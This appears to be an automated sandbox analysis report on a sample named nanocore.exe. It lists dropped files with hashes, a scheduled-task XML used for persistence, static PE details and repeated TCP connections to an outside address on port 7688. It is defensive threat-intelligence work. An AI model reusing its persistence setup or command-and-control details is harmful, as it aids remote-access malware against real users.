          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L.....n`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L.....n`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L.....n`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\tmp38C1.tmp
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1298
          Entropy (8bit):5.088310480171837
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Y+xtn:cbk4oL600QydbQxIYODOLedq3yj
          MD5:E9CED5EE66F06173F8F3B092B79010DE
          SHA1:BC76BE5331F85F7578FD935962AC9B33CC2B4C84
          SHA-256:4660276EA7A477C5FFCA499897DED1F46699637D3BC1BEA135A81CDE2D65E597
          SHA-512:4358E09932D6C4C95A75DC5C9DE1EE7DA6ABE286C9D28C85034261EB1CA37432FAAAC2565CF8132314926B6EDD41DD508F1CC3212EA2D72C098C3219878963EB
          Malicious:true
          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          C:\Users\user\AppData\Local\Temp\tmp3B81.tmp
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):1310
          Entropy (8bit):5.109425792877704
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
          Malicious:false
          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ISO-8859 text, with no line terminators
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:rHn:rH
          MD5:6E43C715DA3279FF2D19AACEF5CFA286
          SHA1:0FEE17EEE58CC51B81398326AB1780256AFB4CC4
          SHA-256:17C98C9953D73CDD75CC7FBC761A9FFB005F6D9C941EE28E3453DBA820ED9257
          SHA-512:8E4C1688E2204B5EDD87F277D2211352AFD8CC9CE9F001ACFAEA6791528E5B165B8CA643074B872E2127370F84125860C4413381DBCFFAB0F77C13FF7DF31ECB
          Malicious:true
          Preview: .%+'...H
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):35
          Entropy (8bit):3.807435516759526
          Encrypted:false
          SSDEEP:3:oNt+WfWLi4dAn:oNwvpAn
          MD5:D43FC6D6883371ADF56312C5835AA391
          SHA1:F520273107B3112B206695814B60A3B99C3AA771
          SHA-256:E311EE9579E921EEBC32D2777133129FF0D961E445A47AD10E01724A4BC40040
          SHA-512:B058B33D57B6340DA0FFEC04B5129C6B20F93C426C51D660B97A2067D9AAF27D7431A5E04FB1A1B078B3B006DF8BE6407E03DA2199090ECF7519267F3BE6649C
          Malicious:false
          Preview: C:\Users\user\Desktop\nanocore.exe

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Entropy (8bit):7.952258735347819
          TrID:
          • Win32 Executable (generic) a (10002005/4) 92.16%
          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:nanocore.exe
          File size:321222
          MD5:08803cc817d8b1046a964af11685b15c
          SHA1:8d76cc9e4e21f90aaa0d2a8e9dd88ccb03349f29
          SHA256:00343ef156007c41a76abebe2b0304aacc7e2b12e0d30ea476ecf8c847a54dfc
          SHA512:bf548910be04b74d3a8bf8f058d642dac070d0cc94ca4eac04ebc4341967acfd65e5b64232be0345994b05a847c7501c122d6f70aeb1fe7121bc8f093028c2f3
          SSDEEP:6144:HdlwCtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KHeG:/xtaR0oQDCANPYNNpUDJX45BkEeG
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

          File Icon

          Icon Hash:b2a88c96b2ca6a72

          Static PE Info

          General

          Entrypoint:0x40314a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:
          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

          Entrypoint Preview

          Instruction
          sub esp, 0000017Ch
          push ebx
          push ebp
          push esi
          xor esi, esi
          push edi
          mov dword ptr [esp+18h], esi
          mov ebp, 00409240h
          mov byte ptr [esp+10h], 00000020h
          call dword ptr [00407030h]
          push esi
          call dword ptr [00407270h]
          mov dword ptr [007A3030h], eax
          push esi
          lea eax, dword ptr [esp+30h]
          push 00000160h
          push eax
          push esi
          push 0079E540h
          call dword ptr [00407158h]
          push 00409230h
          push 007A2780h
          call 00007F08B8C3BAE8h
          mov ebx, 007AA400h
          push ebx
          push 00000400h
          call dword ptr [004070B4h]
          call 00007F08B8C39229h
          test eax, eax
          jne 00007F08B8C392E6h
          push 000003FBh
          push ebx
          call dword ptr [004070B0h]
          push 00409228h
          push ebx
          call 00007F08B8C3BAD3h
          call 00007F08B8C39209h
          test eax, eax
          je 00007F08B8C39402h
          mov edi, 007A9000h
          push edi
          call dword ptr [00407140h]
          call dword ptr [004070ACh]
          push eax
          push edi
          call 00007F08B8C3BA91h
          push 00000000h
          call dword ptr [00407108h]
          cmp byte ptr [007A9000h], 00000022h
          mov dword ptr [007A2F80h], eax
          mov eax, edi
          jne 00007F08B8C392CCh
          mov byte ptr [esp+10h], 00000022h
          mov eax, 00000001h

          Rich Headers

          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_ICON0x3ac1900x2e8dataEnglishUnited States
          RT_DIALOG0x3ac4780x100dataEnglishUnited States
          RT_DIALOG0x3ac5780x11cdataEnglishUnited States
          RT_DIALOG0x3ac6980x60dataEnglishUnited States
          RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
          RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
          USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
          SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Apr 9, 2021 01:08:02.280957937 CEST497407688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:02.303638935 CEST768849740213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:02.811045885 CEST497407688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:02.834539890 CEST768849740213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:03.342253923 CEST497407688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:03.365015030 CEST768849740213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:07.644037962 CEST497467688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:07.667594910 CEST768849746213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:08.186372995 CEST497467688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:08.209548950 CEST768849746213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:08.717704058 CEST497467688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:08.740946054 CEST768849746213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:12.804413080 CEST497477688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:12.829931021 CEST768849747213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:13.343116999 CEST497477688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:13.366044044 CEST768849747213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:13.874443054 CEST497477688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:13.897789955 CEST768849747213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:17.966085911 CEST497507688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:17.989341021 CEST768849750213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:18.499778986 CEST497507688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:18.522970915 CEST768849750213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:19.077910900 CEST497507688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:19.100735903 CEST768849750213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:23.326785088 CEST497527688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:23.350080967 CEST768849752213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:23.984529018 CEST497527688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:24.007906914 CEST768849752213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:24.672143936 CEST497527688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:24.695725918 CEST768849752213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:28.920422077 CEST497537688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:28.944849014 CEST768849753213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:29.453850985 CEST497537688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:29.476957083 CEST768849753213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:29.985090971 CEST497537688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:30.008549929 CEST768849753213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:34.066354990 CEST497547688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:34.090085983 CEST768849754213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:34.594835997 CEST497547688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:34.618825912 CEST768849754213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:35.126112938 CEST497547688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:35.149136066 CEST768849754213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:39.199570894 CEST497597688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:39.222735882 CEST768849759213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:39.735841036 CEST497597688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:39.761449099 CEST768849759213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:40.267229080 CEST497597688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:40.291462898 CEST768849759213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:44.334249973 CEST497677688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:44.357805967 CEST768849767213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:44.861443043 CEST497677688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:44.884512901 CEST768849767213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:45.392525911 CEST497677688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:45.415189028 CEST768849767213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:49.506330013 CEST497687688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:49.529818058 CEST768849768213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:50.033529043 CEST497687688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:50.057566881 CEST768849768213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:50.564888954 CEST497687688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:50.588016033 CEST768849768213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:54.667339087 CEST497697688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:54.690824032 CEST768849769213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:55.206002951 CEST497697688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:55.229613066 CEST768849769213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:55.737279892 CEST497697688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:55.759967089 CEST768849769213.208.152.210192.168.2.4
          Apr 9, 2021 01:08:59.863363981 CEST497707688192.168.2.4213.208.152.210
          Apr 9, 2021 01:08:59.887548923 CEST768849770213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:00.393878937 CEST497707688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:00.417368889 CEST768849770213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:00.925184965 CEST497707688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:00.952183962 CEST768849770213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:05.483297110 CEST497717688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:05.506546021 CEST768849771213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:06.019205093 CEST497717688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:06.042946100 CEST768849771213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:06.550513029 CEST497717688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:06.573656082 CEST768849771213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:10.629232883 CEST497727688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:10.652252913 CEST768849772213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:11.160331964 CEST497727688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:11.186142921 CEST768849772213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:11.691643953 CEST497727688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:11.714682102 CEST768849772213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:15.971256018 CEST497737688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:15.994257927 CEST768849773213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:16.504492998 CEST497737688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:16.528068066 CEST768849773213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:17.035680056 CEST497737688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:17.061697006 CEST768849773213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:21.116499901 CEST497747688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:21.140182972 CEST768849774213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:21.645622969 CEST497747688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:21.668996096 CEST768849774213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:22.176837921 CEST497747688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:22.199614048 CEST768849774213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:26.495048046 CEST497777688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:26.520327091 CEST768849777213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:27.020973921 CEST497777688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:27.043709040 CEST768849777213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:27.552303076 CEST497777688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:27.578279018 CEST768849777213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:31.639210939 CEST497837688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:31.662053108 CEST768849783213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:32.161899090 CEST497837688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:32.186098099 CEST768849783213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:32.693178892 CEST497837688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:32.716573954 CEST768849783213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:36.792944908 CEST497847688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:36.817560911 CEST768849784213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:37.334911108 CEST497847688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:37.358577013 CEST768849784213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:37.865525007 CEST497847688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:37.889213085 CEST768849784213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:42.041429043 CEST497857688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:42.064795017 CEST768849785213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:42.569211960 CEST497857688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:42.594693899 CEST768849785213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:43.100523949 CEST497857688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:43.125225067 CEST768849785213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:47.434952021 CEST497867688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:47.460619926 CEST768849786213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:47.975797892 CEST497867688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:47.999278069 CEST768849786213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:48.507097006 CEST497867688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:48.530107021 CEST768849786213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:52.582787991 CEST497877688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:52.608400106 CEST768849787213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:53.116929054 CEST497877688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:53.140491009 CEST768849787213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:53.648158073 CEST497877688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:53.673993111 CEST768849787213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:57.714632034 CEST497887688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:57.737644911 CEST768849788213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:58.257736921 CEST497887688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:58.282352924 CEST768849788213.208.152.210192.168.2.4
          Apr 9, 2021 01:09:58.789062977 CEST497887688192.168.2.4213.208.152.210
          Apr 9, 2021 01:09:58.813358068 CEST768849788213.208.152.210192.168.2.4
          Apr 9, 2021 01:10:02.835294962 CEST497917688192.168.2.4213.208.152.210
